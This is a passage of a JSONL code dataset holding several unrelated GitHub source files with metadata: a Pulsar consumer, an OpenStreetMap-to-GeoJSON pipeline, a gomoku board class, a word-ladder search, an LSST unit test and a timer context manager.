cost))\n\n# 2\nshortestPath(1)\n\n# 3\nprint(distance[N])\n","repo_name":"plerin/solveThePS","sub_path":"Daily/211011/택배배송_최단경로_5972.py","file_name":"택배배송_최단경로_5972.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9400892842","text":"#!/usr/bin/env python\n# coding: utf-8 \n# Gao Ming Ming Create At 2020-12-17 17:29:54\n# Description:some description\n\nimport pulsar\n\nclient = pulsar.Client('pulsar://localhost:6650')\n\ntopic = 'big_apple'\n#print(client.get_topic_partitions(topic))\nconsumer = client.subscribe(topic,subscription_name='my-sub')\n\nprint(consumer)\n\nwhile True:\n msg = consumer.receive()\n print(msg.data())\n consumer.acknowledge(msg)\n\nclient.close()\n\n","repo_name":"NothinkingGao/pulsar-admin","sub_path":"customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"26155743591","text":"\"\"\"\npython3\n\nRebuild OSM features from OSM urls\n\nOSM features are identified as either relations, ways, or nodes (OSM directions can also be parsed)\n\n\"\"\"\n\nimport sys\nimport os\nimport math\nimport shutil\nimport json\nimport configparser\nimport itertools\nfrom pathlib import Path\n\nfrom shapely.geometry import MultiPolygon\nfrom shapely.ops import unary_union\nimport pandas as pd\nimport geopandas as gpd\n\nimport utils\n\n\n# ensure correct working directory when running as a batch parallel job\n# in all other cases user should already be in project directory\nif not hasattr(sys, 'ps1'):\n os.chdir(os.path.dirname(__file__))\n\n# read config file\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\nbase_dir = Path(config[\"main\"][\"base_directory\"])\nrun_name = config[\"main\"][\"active_run_name\"]\ngithub_name, github_repo, github_branch = config[\"main\"][\"github_name\"], config[\"main\"][\"github_repo\"], config[\"main\"][\"github_branch\"]\n\nrelease_name = config[run_name][\"release_name\"]\n\n\nparallel = config.getboolean(run_name, \"parallel\")\nmax_workers = int(config[run_name][\"max_workers\"])\n\nsample_size = int(config[run_name][\"sample_size\"])\n\n# fields from input csv\nid_field = 
config[run_name][\"id_field\"]\nlocation_field = config[run_name][\"location_field\"]\n\n# search string used to identify relevant OSM link within the location_field of input csv\nosm_str = config[run_name][\"osm_str\"]\n\noutput_project_fields = json.loads(config[run_name][\"output_project_fields\"])\n\nprepare_only = config.getboolean(run_name, \"prepare_only\")\n\nfrom_existing = config.getboolean(run_name, \"from_existing\")\nif from_existing:\n from_existing_timestamp = config[run_name][\"from_existing_timestamp\"]\n\nupdate_mode = config.getboolean(run_name, \"update_mode\")\nif update_mode:\n update_ids = json.loads(config[run_name][\"update_ids\"])\n update_timestamp = config[run_name][\"update_timestamp\"]\n\n\ntimestamp = utils.get_current_timestamp('%Y_%m_%d_%H_%M')\n\n# directory where all outputs will be saved\noutput_dir = base_dir / \"output_data\" / release_name\nresults_dir = output_dir / \"results\" / timestamp\nos.makedirs(os.path.join(results_dir, \"geojsons\"), exist_ok=True)\n\napi = utils.init_overpass_api()\n\n\n# =====\nimport importlib\nimportlib.reload(utils)\n# =====\n\nif __name__ == \"__main__\":\n\n input_data = utils.load_input_data(base_dir, release_name)\n\n link_df_path = results_dir / \"osm_links.csv\"\n invalid_link_df_path = results_dir / \"osm_invalid_links.csv\"\n feature_prep_df_path = results_dir / \"feature_prep.csv\"\n\n if from_existing:\n existing_dir = base_dir / \"output_data\" / release_name / \"results\" / from_existing_timestamp\n existing_link_df_path = existing_dir / \"osm_valid_links.csv\"\n existing_invalid_link_df_path = existing_dir / \"osm_invalid_links.csv\"\n existing_feature_prep_df_path = existing_dir / \"feature_prep.csv\"\n\n full_feature_prep_df = pd.read_csv(existing_feature_prep_df_path)\n\n # copy previously generated files to directory for current run\n shutil.copyfile(existing_link_df_path, link_df_path)\n shutil.copyfile(existing_invalid_link_df_path, invalid_link_df_path)\n\n else:\n\n loc_df = input_data[[id_field, location_field]].copy(deep=True)\n loc_df.columns = [\"id\", \"location\"]\n\n if update_mode:\n loc_df = loc_df.loc[loc_df[\"id\"].isin(update_ids)]\n\n # keep rows where location field contains at least one osm link\n link_df = loc_df.loc[loc_df.location.notnull() & loc_df.location.str.contains(osm_str)].copy(deep=True)\n # get osm links from location field\n link_df[\"osm_list\"] = link_df.location.apply(lambda x: utils.split_and_match_text(x, \" \", osm_str))\n # save dataframe with osm links to csv\n link_df.to_csv(link_df_path, index=False, encoding=\"utf-8\")\n\n # save all rows invalid osm links to separate csv that can be referenced for fixes\n invalid_str_list = [\"search\", \"query\"]\n invalid_link_df = link_df.loc[link_df.osm_list.apply(lambda x: any(i in str(x) for i in invalid_str_list))].copy(deep=True)\n invalid_link_df.to_csv(invalid_link_df_path, index=False, encoding=\"utf-8\")\n\n # drop all rows with invalid osm links\n valid_link_df = link_df.loc[~link_df.index.isin(invalid_link_df.index)].copy(deep=True)\n\n print(f\"\"\"\n {len(loc_df)} projects provides\n {len(link_df)} contain OSM links\n {len(invalid_link_df)} contain at least 1 non-parseable link\n {len(valid_link_df)} projects with valid links\n \"\"\")\n\n full_feature_prep_df = utils.classify_osm_links(valid_link_df)\n\n\n\n # option to sample data for testing; sample size <=0 returns full dataset\n feature_prep_df = utils.sample_features(full_feature_prep_df, sample_size=2)\n\n 
print(feature_prep_df.osm_type.value_counts())\n\n # get svg path for osm \"directions\" links\n results = utils.generate_svg_paths(feature_prep_df, overwrite=False)\n\n # join svg paths back to dataframe\n for unique_id, svg_path in results:\n feature_prep_df.loc[unique_id, \"svg_path\"] = svg_path\n\n\n\n feature_prep_df.to_csv(feature_prep_df_path, index=False)\n\n if prepare_only:\n sys.exit(\"Completed preparing feature_prep_df.csv, and exiting as `prepare_only` option was set.\")\n\n\n\n # -------------------------------------\n # -------------------------------------\n\n def gen_flist(df):\n # generate list of tasks to iterate over\n flist = list(zip(\n df[\"unique_id\"],\n df[\"clean_link\"],\n df[\"osm_type\"],\n df[\"osm_id\"],\n df[\"svg_path\"],\n # itertools.repeat(driver),\n itertools.repeat(api)\n ))\n return flist\n\n flist = gen_flist(feature_prep_df)\n\n\n print(\"Running feature generation\")\n\n valid_df = None\n errors_df = None\n iteration = 0\n while errors_df is None or len(errors_df) > 0:\n\n iteration += 1\n\n if errors_df is not None:\n flist = gen_flist(errors_df)\n\n # get_osm_feat for each row in feature_prep_df\n # - parallelize\n # - buffer lines/points\n # - convert all features to multipolygons\n\n # results = []\n # for result in run_tasks(get_osm_feat, flist, parallel, max_workers=max_workers, chunksize=1, unordered=True):\n # results.append(result)\n iter_max_workers = math.ceil(max_workers / iteration)\n\n results = utils.run_tasks(utils.get_osm_feat, flist, parallel, max_workers=iter_max_workers, chunksize=1)\n\n # ---------\n # column name for join field in original df\n results_join_field_name = \"unique_id\"\n # position of join field in each tuple in task list\n results_join_field_loc = 0\n # ---------\n\n # join function results back to df\n results_df = pd.DataFrame(results, columns=[\"status\", \"message\", results_join_field_name, \"feature\"])\n # results_df.drop([\"feature\"], axis=1, inplace=True)\n results_df[results_join_field_name] = results_df[results_join_field_name].apply(lambda x: x[results_join_field_loc])\n\n output_df = feature_prep_df.merge(results_df, on=results_join_field_name, how=\"left\")\n\n\n if valid_df is None:\n valid_df = output_df[output_df[\"status\"] == 0].copy()\n else:\n valid_df = pd.concat([valid_df, output_df.loc[output_df.status == 0]])\n\n\n errors_df = output_df[output_df[\"status\"] > 0].copy()\n print(\"\\t{} errors found out of {} tasks\".format(len(errors_df), len(output_df)))\n\n if iter_max_workers == 1 or iteration >= 5 or len(set(errors_df.message)) == 1 and \"IndexError\" in list(set(errors_df.message))[0]:\n break\n\n\n errors_df.to_csv(os.path.join(results_dir, \"processing_errors_df.csv\"), index=False)\n\n # output valid results to csv\n valid_df[[i for i in valid_df.columns if i != \"feature\"]].to_csv(results_dir / \"valid_df.csv\", index=False)\n valid_df.to_csv(results_dir / \"valid_gdf.csv\", index=False)\n\n\n # -------------------------------------\n # -------------------------------------\n\n\n print(\"Building GeoJSONs\")\n\n # combine features for each project\n # - iterate over all polygons (p) within feature multipolygons (mp) to create single multipolygon per project\n\n grouped_df = valid_df.groupby(\"project_id\")[\"feature\"].apply(list).reset_index(name=\"feature_list\")\n # for group in grouped_df:\n # group_mp = MultiPolygon([p for mp in group.feature for p in mp]).__geo_interface_\n # move this to apply instead of loop so we can have a final df to output results/errors to\n 
grouped_df[\"multipolygon\"] = grouped_df.feature_list.apply(lambda mp_list: unary_union([p for mp in mp_list for p in mp.geoms]))\n grouped_df[\"multipolygon\"] = grouped_df.multipolygon.apply(lambda x: MultiPolygon([x]) if x.type == \"Polygon\" else x)\n grouped_df[\"feature_count\"] = grouped_df.feature_list.apply(lambda mp: len(mp))\n grouped_df[\"geojson_path\"] = grouped_df.project_id.apply(lambda x: os.path.join(results_dir, \"geojsons\", f\"{x}.geojson\"))\n\n\n # join original project fields back to be included in geojson properties\n project_data_df = input_data[output_project_fields].copy()\n grouped_df = grouped_df.merge(project_data_df, left_on=\"project_id\", right_on=id_field, how=\"left\")\n\n\n # -----\n # create individual geojsons\n for ix, row in grouped_df.iterrows():\n path, geom, props = utils.prepare_single_feature(row)\n utils.output_single_feature_geojson(geom, props, path)\n\n if update_mode:\n # copy geojsons from update_timestamp geojsons dir to current timestamp geojsons dir\n update_target_geojsons = base_dir / \"output_data\" / release_name / \"results\" / update_timestamp / \"geojsons\"\n for gj in update_target_geojsons.iterdir():\n if int(gj.name.split(\".\")[0]) not in grouped_df.project_id.values:\n shutil.copy(gj, results_dir / \"geojsons\")\n\n # -----\n # create combined GeoJSON for all data\n combined_gdf = pd.concat([gpd.read_file(gj) for gj in (results_dir / \"geojsons\").iterdir()])\n\n # add github geojson urls\n combined_gdf[\"viz_geojson_url\"] = combined_gdf.id.apply(lambda x: f\"https://github.com/{github_name}/{github_repo}/blob/{github_branch}/latest/geojsons/{x}.geojson\")\n combined_gdf[\"dl_geojson_url\"] = combined_gdf.id.apply(lambda x: f\"https://raw.githubusercontent.com/{github_name}/{github_repo}/{github_branch}/latest/geojsons/{x}.geojson\")\n\n # date fields can get loaded a datetime objects which can geopandas doesn't always like to output, so convert to string to be safe\n for c in combined_gdf.columns:\n if c.endswith(\"Date (MM/DD/YYYY)\"):\n combined_gdf[c] = combined_gdf[c].apply(lambda x: str(x))\n\n combined_gdf.to_file(results_dir / \"all_combined_global.geojson\", driver=\"GeoJSON\")\n\n # -----\n # create combined GeoJSON for each finance type\n for i in set(combined_gdf.finance_type):\n print(i)\n subgrouped_df = combined_gdf[combined_gdf.finance_type == i].copy()\n subgrouped_df.to_file(results_dir / f\"{i}_combined_global.geojson\", driver=\"GeoJSON\")\n\n\n # -----\n # create final csv\n drop_cols = ['project_id', 'feature_list', 'multipolygon', 'feature_count', 'geojson_path', 'geometry']\n combined_gdf[[i for i in combined_gdf.columns if i not in drop_cols]].to_csv(os.path.join(results_dir, \"final_df.csv\"), index=False)\n\n\n # -----\n # final summary output\n print(f\"\"\"\n Dataset complete: {timestamp}\n \\t{results_dir}\n To set this as latest dataset: \\n\\t bash {base_dir}/set_latest.sh {release_name} {timestamp}\n \"\"\")\n","repo_name":"aiddata/china-osm-geodata","sub_path":"tuff_osm.py","file_name":"tuff_osm.py","file_ext":"py","file_size_in_byte":11675,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"76"} +{"seq_id":"16195736070","text":"from typing import Set, List\nfrom typing_extensions import Literal\nfrom collections import defaultdict\n\nclass ChessBoard(object):\n '''\n Chess Board\n A gomoku board class.\n '''\n def __init__(self, size:int=15, win_len:int=5) -> None:\n '''\n Initialize a board.\n ## Parameters\\n\n size: int, optional\n Size of 
the gomoku board. Default is 15, which is the standard size.\n Don't passed a number greater than 15.\n win_len: int, optional\n Number of stones in a line needed to win a game. Default is 5.\n '''\n self.size = size\n self.win_len = win_len\n self.board = [[0 for _ in range(size)] for _ in range(size)]\n self.count = [[0 for _ in range(size)] for _ in range(size)]\n self.link3 = {c: set() for c in [1, -1]}\n self.link4 = {c: set() for c in [1, -1]}\n self.link5 = {c: set() for c in [1, -1]}\n self.par_link3 = {c: set() for c in [1, -1]}\n self.par_link4 = {c: set() for c in [1, -1]}\n self.cross = {c: set() for c in [1, -1]}\n self.par_cross = {c: set() for c in [1, -1]}\n self.dir = {c: {} for c in [1, -1]}\n self.par_dir = {c: defaultdict(dict) for c in [1, -1]}\n self.moves: List[tuple] = []\n self.now_playing: Literal[1, -1] = 1\n self.winner = 0\n \n def is_inside(self, move:tuple) -> bool:\n i, j = move\n is_inside = i >= 0 and i < self.size and j >= 0 and j < self.size\n return is_inside\n\n def is_legal(self, move:tuple) -> bool:\n '''\n Judge whether a stone can be placed at given coordinate.\n ## Parameters\\n\n move: tuple\n The coordinate of move about to be judged.\n '''\n is_inside = self.is_inside(move)\n if not is_inside:\n return False\n is_vacancy = self.board[move[0]][move[1]] == 0\n return is_vacancy\n\n def play_stone(self, move:tuple) -> None:\n '''\n Play a stone at the given coordinate.\n ## Parameters\\n\n move: tuple\n The coordinate of move to be played.\n '''\n if not self.is_legal(move):\n raise ValueError(f'Cannot play a stone at {move}.')\n else:\n self.board[move[0]][move[1]] = self.now_playing\n self.moves.append(move)\n self.update_count(move)\n self.now_playing = -self.now_playing\n return\n \n def update_count(self, move:tuple) -> None:\n for player in (1, -1):\n for group in (self.link3, self.link4, self.link5, self.cross, self.par_cross):\n if move in group[player]:\n group[player].remove(move)\n for group in (self.par_link3, self.par_link4):\n if move in group[player]:\n group[player].remove(move)\n self.par_dir[player][move].clear()\n for i in range(2):\n for j in range(-1, 2):\n if i == 0 and j < 1:\n continue\n l_max, r_max = 0, 0\n l_ext, r_ext = 0, 0\n l_par, r_par = 0, 0\n while True:\n x = move[0] + (l_max - 1) * i\n y = move[1] + (l_max - 1) * j\n if not self.is_inside((x, y)) or self.board[x][y] != self.now_playing:\n if self.is_inside((x, y)):\n if self.board[x][y] == 0:\n x -= i\n y -= j\n while self.is_inside((x, y)) and self.board[x][y] == self.now_playing:\n l_ext += 1\n x -= i\n y -= j\n if l_ext == 0 and self.is_inside((x, y)) and self.board[x][y] == 0:\n x -= i\n y -= j\n while self.is_inside((x, y)) and self.board[x][y] == self.now_playing:\n l_par += 1\n x -= i\n y -= j\n break\n l_max -= 1\n while True:\n x = move[0] + (r_max + 1) * i\n y = move[1] + (r_max + 1) * j\n if not self.is_inside((x, y)) or self.board[x][y] != self.now_playing:\n if self.is_inside((x, y)):\n if self.board[x][y] == 0:\n x += i\n y += j\n while self.is_inside((x, y)) and self.board[x][y] == self.now_playing:\n r_ext += 1\n x += i\n y += j\n if r_ext == 0 and self.is_inside((x, y)) and self.board[x][y] == self.now_playing:\n x += i\n y += j\n while self.is_inside((x, y)) and self.board[x][y] == self.now_playing:\n r_par += 1\n x += i\n y += j\n break\n r_max += 1\n\n cnt = r_max - l_max + 1\n for k in range(l_max, r_max + 1):\n x = move[0] + k * i\n y = move[1] + k * j\n self.count[x][y] = max(self.count[x][y], cnt)\n \n l_x = move[0] + (l_max - 1) * i\n 
l_y = move[1] + (l_max - 1) * j\n ll_x = move[0] + (l_max - 2) * i\n ll_y = move[1] + (l_max - 2) * j\n r_x = move[0] + (r_max + 1) * i\n r_y = move[1] + (r_max + 1) * j\n rr_x = move[0] + (r_max + 2) * i\n rr_y = move[1] + (r_max + 2) * j\n\n if self.is_inside((l_x, l_y)) and self.board[l_x][l_y] == 0:\n for group in (self.par_link3, self.par_link4):\n for player in (1, -1):\n # remove same direction adjacant stone\n if (l_x, l_y) in group and (i, j) in self.par_dir[player][(l_x, l_y)]:\n group[player].remove((l_x, l_y))\n self.par_dir[player][(l_x, l_y)].pop((i, j))\n if len(self.par_dir[player]) + ((l_x, l_y) in self.dir[player]) < 2:\n if (l_x, l_y) in self.par_cross[self.now_playing]:\n self.par_cross[self.now_playing].remove(l_x, l_y)\n\n # add link3/4/5\n # e.g. xxa, xax, xxxa, xxax, xxxax\n if cnt + l_ext >= 4:\n if (l_x, l_y) in self.link4[self.now_playing]:\n self.link4[self.now_playing].remove((l_x, l_y))\n self.link5[self.now_playing].add((l_x, l_y))\n elif cnt + l_ext == 3:\n if (l_x, l_y) in self.link3[self.now_playing]:\n self.link3[self.now_playing].remove((l_x, l_y))\n self.link4[self.now_playing].add((l_x, l_y))\n elif cnt + l_ext == 2:\n self.link3[self.now_playing].add((l_x, l_y))\n if cnt + l_ext >= 2:\n if (l_x, l_y) in self.dir[self.now_playing]:\n if self.dir[self.now_playing][(l_x, l_y)] != (i, j):\n self.cross[self.now_playing].add((l_x, l_y))\n else:\n self.dir[self.now_playing][(l_x, l_y)] = (i, j)\n \n # add partial link3/4\n # e.g. xoax xaox, xxoa, xxoax, xxxoa\n if l_ext == 0:\n if l_par > 0:\n par_dir_dict = self.par_dir[self.now_playing][(l_x, l_y)]\n if cnt + l_par >= 3:\n if (l_x, l_y) in self.par_link3:\n if par_dir_dict.get((i, j), 0) == 3:\n self.par_link3.remove((l_x, l_y))\n self.par_link4[self.now_playing].add((l_x, l_y))\n par_dir_dict[(i, j)] = 4\n elif cnt + l_par == 2:\n self.par_link3[self.now_playing].add((l_x, l_y))\n par_dir_dict[(i, j)] = 3\n else:\n raise ValueError('cnt')\n if len(par_dir_dict) + ((l_x, l_y) in self.dir[self.now_playing]) >= 2:\n self.par_cross[self.now_playing].add((l_x, l_y))\n if self.is_inside((ll_x, ll_y)) and self.board[ll_x][ll_y] == 0:\n par_dir_dict = self.par_dir[self.now_playing][(ll_x, ll_y)]\n if cnt + l_par >= 3:\n if (ll_x, ll_y) in self.par_link3:\n if par_dir_dict.get((i, j), 0) == 3:\n self.par_link3.remove((ll_x, ll_y))\n self.par_link4[self.now_playing].add((ll_x, ll_y))\n par_dir_dict[(i, j)] = 4\n elif cnt + l_par == 2:\n self.par_link3[self.now_playing].add((ll_x, ll_y))\n par_dir_dict[(i, j)] = 3\n if len(par_dir_dict) + ((ll_x, ll_y) in self.dir[self.now_playing]) >= 2:\n self.par_cross[self.now_playing].add((ll_x, ll_y))\n\n del l_x, l_y, ll_x, ll_y, l_max, l_ext, l_par\n\n if self.is_inside((r_x, r_y)) and self.board[r_x][r_y] == 0:\n for group in (self.par_link3, self.par_link4):\n for player in (1, -1):\n # remove same direction adjacant stone\n if (r_x, r_y) in group and (i, j) in self.par_dir[player][(r_x, r_y)]:\n group[player].remove((r_x, r_y))\n self.par_dir[player][(r_x, r_y)].remove((i, j))\n if cnt + r_ext >= 4:\n if (r_x, r_y) in self.link4[self.now_playing]:\n self.link4[self.now_playing].remove((r_x, r_y))\n self.link5[self.now_playing].add((r_x, r_y))\n elif cnt + r_ext == 3:\n if (r_x, r_y) in self.link3[self.now_playing]:\n self.link3[self.now_playing].remove((r_x, r_y))\n self.link4[self.now_playing].add((r_x, r_y))\n elif cnt + r_ext == 2:\n self.link3[self.now_playing].add((r_x, r_y))\n if cnt + r_ext >= 2:\n if (r_x, r_y) in self.dir[self.now_playing]:\n if 
self.dir[self.now_playing][(r_x, r_y)] != (i, j):\n self.cross[self.now_playing].add((r_x, r_y))\n else:\n self.dir[self.now_playing][(r_x, r_y)] = (i, j)\n\n if r_ext == 0:\n if r_par > 0:\n par_dir_dict = self.par_dir[self.now_playing][(r_x, r_y)]\n if cnt + r_par >= 3:\n if (r_x, r_y) in self.par_link3:\n if par_dir_dict.get((i, j), 0) == 3:\n self.par_link3.remove((r_x, r_y))\n self.par_link4[self.now_playing].add((r_x, r_y))\n par_dir_dict[(i, j)] = 4\n elif cnt + r_par == 2:\n self.par_link3[self.now_playing].add((r_x, r_y))\n par_dir_dict[(i, j)] = 3\n else:\n raise ValueError('cnt')\n if len(par_dir_dict) + ((r_x, r_y) in self.dir[self.now_playing]) >= 2:\n self.par_cross[self.now_playing].add((r_x, r_y))\n if self.is_inside((rr_x, rr_y)) and self.board[rr_x][rr_y] == 0:\n par_dir_dict = self.par_dir[self.now_playing][(rr_x, rr_y)]\n if cnt + r_par >= 3:\n if (rr_x, rr_y) in self.par_link3:\n if par_dir_dict.get((i, j), 0) == 3:\n self.par_link3.remove((rr_x, rr_y))\n self.par_link4[self.now_playing].add((rr_x, rr_y))\n par_dir_dict[(i, j)] = 4\n elif cnt + r_par == 2:\n self.par_link3[self.now_playing].add((rr_x, rr_y))\n par_dir_dict[(i, j)] = 3\n if len(par_dir_dict) + ((rr_x, rr_y) in self.dir[self.now_playing]) >= 2:\n self.par_cross[self.now_playing].add((rr_x, rr_y))\n\n\n def display_board(self) -> None:\n '''\n Print all placed stone.\n '''\n if self.moves == []:\n return\n else:\n i_ticks = ' 0 1 2 3 4 5 6 7 8 9 A B C D E'\n i_ticks = i_ticks[0:1+2*self.size]\n print(i_ticks)\n for j in range(self.size):\n if j < 10:\n print(j, end='')\n else:\n print(chr(55 + j), end='')\n for i in range(self.size):\n print(' ', end='')\n if self.board[i][j] > 0:\n print('o', end='')\n elif self.board[i][j] < 0:\n print('x', end='')\n else:\n print(' ', end='')\n if i == self.size - 1:\n print()\n return\n\n def adjacent_vacancies(self) -> Set[tuple]:\n '''\n ## Returns\\n\n out: Set[tuple]\n A set which contains all available moves around existed stones. \\\n 'Around' means the horizontal AND vertival distance between a vacancy and \\\n the nearest stone is no greater than 1.\n '''\n vacancies = set()\n if self.moves != []:\n bias = range(-1, 2)\n for move in self.moves:\n for i in bias:\n if move[0]-i < 0 or move[0]-i >= self.size:\n continue\n for j in bias:\n if move[1]-j < 0 or move[1]-j >= self.size:\n continue\n vacancies.add((move[0]-i, move[1]-j))\n\n if self.board[move[0]][move[1]] == self.now_playing:\n for i in [-1, 1]:\n if move[0]-i < 0 or move[0]-i >= self.size:\n continue\n for j in [-1, 1]:\n if move[1]-j < 0 or move[1]-j >= self.size:\n continue\n vacancies.add((move[0]-i, move[1]-j))\n for i, j in [(0, 2), (0, -2), (2, 0), (-2, 0)]:\n if move[0]-i < 0 or move[0]-i >= self.size:\n continue\n if move[1]-j < 0 or move[1]-j >= self.size:\n continue\n vacancies.add((move[0]-i, move[1]-j))\n occupied = set(self.moves)\n vacancies -= occupied\n return vacancies\n\n def is_ended(self) -> bool:\n '''\n Judge whether the game is ended or not. The winner will be passed to `self.winner`. \\\n The algorithm is not easy to understand. 
You can check it by traverse the `for` loop.\n ## Returns\\n\n out: bool\n Return `True` if the game ended, otherwise `False`.\n '''\n if self.moves == []:\n return False\n loc_i, loc_j = self.moves[-1]\n color = -self.now_playing\n sgn_i = [1, 0, 1, 1]\n sgn_j = [0, 1, 1, -1]\n for iter in range(4):\n length = 0\n prm1 = loc_i if sgn_i[iter] == 1 else loc_j\n prm2 = loc_j if sgn_j[iter] == 1 else (loc_i if sgn_j[iter] == 0 else self.size - 1 - loc_j)\n start_bias = -min(prm1, prm2) if min(prm1, prm2) < self.win_len-1 else -self.win_len+1\n end_bias = self.size - 1 - max(prm1, prm2) if max(prm1, prm2) > self.size-self.win_len else self.win_len-1\n for k in range(start_bias, end_bias+1):\n stone = self.board[loc_i + k * sgn_i[iter]][loc_j + k * sgn_j[iter]]\n if color > 0 and stone > 0 or color < 0 and stone < 0:\n length += 1\n else:\n length = 0\n if length == self.win_len:\n self.winner = 1 if color > 0 else -1\n return True\n if len(self.moves) == self.size ** 2:\n return True\n else:\n return False","repo_name":"ChillingDream/AlphaGomoku","sub_path":"ChessBoard.py","file_name":"ChessBoard.py","file_ext":"py","file_size_in_byte":17623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72050521526","text":"answer = 1e9\n\n\ndef is_same_inner_value(a_list, b_list):\n for a, b in zip(a_list, b_list):\n if a != b:\n return False\n return True\n\n\ndef dfs(d, b, t, w, v):\n global answer\n if is_same_inner_value(b, t):\n answer = min(d, answer)\n return\n for word in w:\n for i in range(len(b)):\n if b[i] != word[i]:\n temp = b[i]\n b[i] = word[i]\n str_b = ''.join(b)\n if str_b in w and str_b not in v:\n v.add(str_b)\n dfs(d + 1, b, t, w, v)\n b[i] = temp\n\n\ndef solution(begin, target, words):\n if target not in words:\n return 0\n words.remove(target)\n words.insert(0, target)\n dfs(0, list(begin), list(target), words, set())\n return answer","repo_name":"algorithm-studyy/algorithm","sub_path":"jiwon/programmers/python/change_word.py","file_name":"change_word.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37687709030","text":"import unittest\n\nimport lsst.utils.tests\nfrom lsst.daf.base import PropertyList\nfrom lsst.obs.base import exposureFromImage\nimport lsst.afw.image as afwImage\n\n\nclass ExposureFromImageTestCase(lsst.utils.tests.TestCase):\n \"\"\"A test case for exposureFromImage.\"\"\"\n\n def setUp(self):\n self.maskedImage = makeRampMaskedImage(10, 11)\n\n def tearDown(self):\n del self.maskedImage\n\n def testDecoratedImage(self):\n image = self.maskedImage.getImage()\n decoImage = afwImage.DecoratedImageF(image)\n metadata = PropertyList()\n metadata.set(\"FOO\", \"BAR\")\n decoImage.setMetadata(metadata)\n exposure = exposureFromImage(decoImage)\n self.assertImagesEqual(exposure.getMaskedImage().getImage(), image)\n md = exposure.getMetadata()\n self.assertEqual(md.getScalar(\"FOO\"), \"BAR\")\n\n def testExposure(self):\n inExposure = afwImage.ExposureF(self.maskedImage)\n outExposure = exposureFromImage(inExposure)\n self.assertIs(inExposure, outExposure)\n\n def testImage(self):\n image = self.maskedImage.getImage()\n exposure = exposureFromImage(image)\n self.assertImagesEqual(image, exposure.getMaskedImage().getImage())\n\n def testMaskedImage(self):\n exposure = exposureFromImage(self.maskedImage)\n self.assertMaskedImagesEqual(self.maskedImage, exposure.getMaskedImage())\n\n def 
testDecoratedImageBadWcs(self):\n \"\"\"Test that exposureFromImage() attaches a None wcs to the exposure\n when the WCS cannot be constructed\n \"\"\"\n image = self.maskedImage.getImage()\n decoImage = afwImage.DecoratedImageF(image)\n metadata = PropertyList()\n metadata.set(\"CTYPE1\", \"RA---TPV\")\n metadata.set(\"CTYPE2\", \"DEC--TPV\")\n decoImage.setMetadata(metadata)\n exposure = exposureFromImage(decoImage)\n self.assertIs(exposure.getWcs(), None)\n\n\ndef makeRampMaskedImage(width, height, imgClass=afwImage.MaskedImageF):\n \"\"\"Make a ramp image of the specified size and image class\n\n Image values start from 0 at the lower left corner and increase by 1 along\n rows. Variance values equal image values + 100.\n Mask values equal image values modulo 8 bits (leaving plenty of unused\n values).\n \"\"\"\n mi = imgClass(width, height)\n image = mi.getImage()\n mask = mi.getMask()\n variance = mi.getVariance()\n val = 0\n for yInd in range(height):\n for xInd in range(width):\n image[xInd, yInd, afwImage.LOCAL] = val\n variance[xInd, yInd, afwImage.LOCAL] = val + 100\n mask[xInd, yInd, afwImage.LOCAL] = val % 0x100\n val += 1\n return mi\n\n\nclass MemoryTester(lsst.utils.tests.MemoryTestCase):\n pass\n\n\ndef setup_module(module):\n lsst.utils.tests.init()\n\n\nif __name__ == \"__main__\":\n lsst.utils.tests.init()\n unittest.main()\n","repo_name":"gcmshadow/obs_base","sub_path":"tests/test_exposureFromImage.py","file_name":"test_exposureFromImage.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14283347889","text":"#!/usr/bin/env python3\n#pylint: disable=C0103\n\n# Douglas Klos\n# March 7th, 2019\n# Python 210, Extra\n# run_timer_context.py\n\n\"\"\" Run file for context manager testing \"\"\"\n\nimport io\nimport time\nfrom contextlib import contextmanager\nimport timer_context as tc\n\n\n@contextmanager\ndef local_timer(out_file, name=''):\n \"\"\" Context manager that returns execution time \"\"\"\n local_time = time.time()\n try:\n yield local_time\n finally:\n local_time = time.time() - local_time\n out_file.write(f'{name} execution took {local_time} seconds')\n\n\ndef timer_test():\n \"\"\" Runs a loop with context manager and prints execution time \"\"\"\n outfile = io.StringIO()\n\n with tc.Timer(outfile, 'timer_test'):\n for i in range(1000000):\n i = i ** 20\n\n print(outfile.getvalue())\n\n\ndef timer_test2():\n \"\"\" Runs a loop with context manager and prints execution time \"\"\"\n outfile = io.StringIO()\n\n with local_timer(outfile, 'timer_test2'):\n for i in range(1000000):\n i = i ** 20\n\n print(outfile.getvalue())\n\n\ndef main():\n \"\"\" Main, calls different tests \"\"\"\n timer_test()\n timer_test2()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"UWPCE-PythonCert-ClassRepos/GP_Python210B_Winter_2019","sub_path":"students/douglas_klos/extra/context/timer/run_timer_context.py","file_name":"run_timer_context.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73987324406","text":"from __future__ import annotations\n\nfrom uuid import uuid4\n\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\n\nfrom sentry.constants import ObjectStatus\nfrom sentry.integrations import (\n FeatureDescription,\n IntegrationFeatures,\n 
